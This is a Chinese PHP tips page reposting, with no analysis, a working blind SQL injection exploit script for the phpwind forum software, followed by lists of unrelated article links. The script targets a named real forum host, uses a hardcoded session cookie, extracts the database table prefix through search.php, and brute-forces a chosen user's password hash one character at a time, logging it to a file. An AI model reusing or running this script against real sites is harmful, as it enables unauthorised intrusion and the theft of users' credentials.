首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

从网上搜到的phpwind 0day的代码

Posted in PHP onDecember 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";
$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}
fclose($log);
echo "<br>Done!We Post $count times!<br>";

function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

从网上搜到的phpwind 0day的代码

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
深入了解php4(1)--回到未来
Oct 09 PHP
php仿ZOL分页类代码
Oct 02 PHP
php中一个有意思的日期逻辑处理
Mar 25 PHP
php截取字符串之截取utf8或gbk编码的中英文字符串示例
Mar 12 PHP
php使用curl获取https请求的方法
Feb 11 PHP
php短网址和数字之间相互转换的方法
Mar 13 PHP
通过PHP自带的服务器来查看正则匹配结果的方法
Dec 24 PHP
PHP中strcmp()和strcasecmp()函数字符串比较用法分析
Jan 07 PHP
PHP环境搭建的详细步骤
Jun 30 PHP
PHP实现超简单的SSL加密解密、验证及签名的方法示例
Aug 28 PHP
PHP实现的二分查找算法实例分析
Dec 19 PHP
php多进程应用场景实例详解
Jul 22 PHP
ajax缓存问题解决途径
Dec 06 #PHP
数字转英文
Dec 06 #PHP
?生?D片??C字串
Dec 06 #PHP
?算你??的 PHP 程式大小
Dec 06 #PHP
PHP中,文件上传
Dec 06 #PHP
eWebEditor v3.8 商业完整版 (PHP)
Dec 06 #PHP
实现 win2003 下 mysql 数据库每天自动备份
Dec 06 #PHP
GoFrame(3) harbor(1) dockerfile(1) Tablespace(1) 短信验证码(1) procedure(1) commit(1) 分布式锁(3) pytz(1) SQLite3(1)
You might like
谈谈PHP语法(2)
2006/10/09 PHP
在PHP中读取和写入WORD文档的代码
2008/04/09 PHP
ThinkPHP模板自定义标签使用方法
2014/06/26 PHP
php二维码生成
2015/10/19 PHP
PHP pthreads v3下worker和pool的使用方法示例
2020/02/21 PHP
PHP设计模式(三)建造者模式Builder实例详解【创建型】
2020/05/02 PHP
php连接mysql之mysql_connect()与mysqli_connect()的区别
2020/07/19 PHP
Js和JQuery获取鼠标指针坐标的实现代码分享
2015/05/25 Javascript
每天一篇javascript学习小结(String对象)
2015/11/18 Javascript
jQuery视差滚动效果网页实现方法经验总结
2016/09/29 Javascript
基于jQuery和CSS3实现APPLE TV海报视差效果
2017/06/16 jQuery
激动人心的 Angular HttpClient的源码解析
2017/07/10 Javascript
javascript 中select框触发事件过程的分析
2017/08/01 Javascript
JavaScript变量类型以及变量作用域详解
2017/08/14 Javascript
vue组件实现文字居中对齐的方法
2017/08/23 Javascript
基于zepto.js实现登录界面
2017/10/09 Javascript
浅谈mint-ui 填坑之路
2017/11/06 Javascript
快速解决angularJS中用post方法时后台拿不到值的问题
2018/08/14 Javascript
详解Webpack-dev-server的proxy用法
2018/09/08 Javascript
Vue 解决在element中使用$notify在提示信息中换行问题
2020/11/11 Javascript
Node.js 中如何收集和解析命令行参数
2021/01/08 Javascript
[19:54]夜魇凡尔赛茶话会 第一期02:看图识人
2021/03/11 DOTA
Python后台开发Django的教程详解(启动)
2019/04/08 Python
解决pip install psycopg2出错问题
2020/07/09 Python
介绍下WebSphere的安全性
2013/01/31 面试题
内部类的定义、种类以及优点
2013/10/16 面试题
通信研究生自荐信
2014/02/01 职场文书
最新大学生创业计划书写作攻略
2014/04/02 职场文书
乡镇个人对照检查材料
2014/08/22 职场文书
单位工作证明格式模板
2014/10/04 职场文书
2014年服务行业工作总结
2014/11/18 职场文书
2015欢度元旦标语口号
2014/12/09 职场文书
校车安全管理责任书
2015/05/11 职场文书
2016国庆节67周年寄语
2015/12/07 职场文书
Python数据可视化之用Matplotlib绘制常用图形
2021/06/03 Python
Maven学习----Maven安装与环境变量配置教程
2021/06/29 Java/Android